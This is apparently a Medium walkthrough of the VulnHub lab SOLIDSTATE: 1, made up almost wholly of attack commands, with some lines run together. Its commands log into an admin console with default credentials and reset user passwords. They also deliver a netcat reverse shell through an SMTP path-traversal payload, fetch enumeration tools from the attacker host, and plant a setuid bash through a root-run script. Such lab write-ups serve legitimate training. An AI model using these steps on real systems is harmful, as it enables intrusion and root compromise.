VulnHub: SOLIDSTATE: 1

  1. Network Discovery
nmap -Pn 10.0.2.25namp -Pn -p1000- 10.0.2.25
nmap -A -p22,25,80,110,119,4555 10.0.2.25
nmap --script vuln -p22,25,80,110,119,4555 10.0.2.25
nikto -h http://10.0.2.25
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.25/ -x php,txt,html,sh,cgi -q
telnet 10.0.2.25 4555Username: rootPassword: root
HELP
listusers
setpassword <username> 1234
ssh mindy@10.0.2.25
ls -lacat user.txt
cd ..
cat /etc/passwd
adduser ../../../../../../../../etc/bash_completion.d password
rlwrap nc -lvp 443
telnet 10.0.2.25 25
EHLO bla.blaMAIL FROM: <'you@domain.com>RCPT TO: <../../../../../../../../etc/bash_completion.d>DATAFrom: bla.bla'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.27 443 >/tmp/f.
ssh mindy@10.0.2.25
whoami
python -c 'import pty;pty.spawn("/bin/bash");'
python -m SimpleHTTPServer 80
cd /tmpwget http://10.0.2.27/LinEnum.sh
chmod 777 LinEnum.sh/tmp/LinEnum.sh -t
sudo -l
getcap -r / 2>/dev/null
ps aux | grep "^root"
wget http://10.0.2.27/pspy32chmod 777 pspy 32/tmp/pspy32
cd /optcat tmp.py
echo 'os.system("cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash")' >> tmp.pycat tmp.py
cd /tmpls -la
/tmp/rootbash -pwhoami
cd /rootls -lacat root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store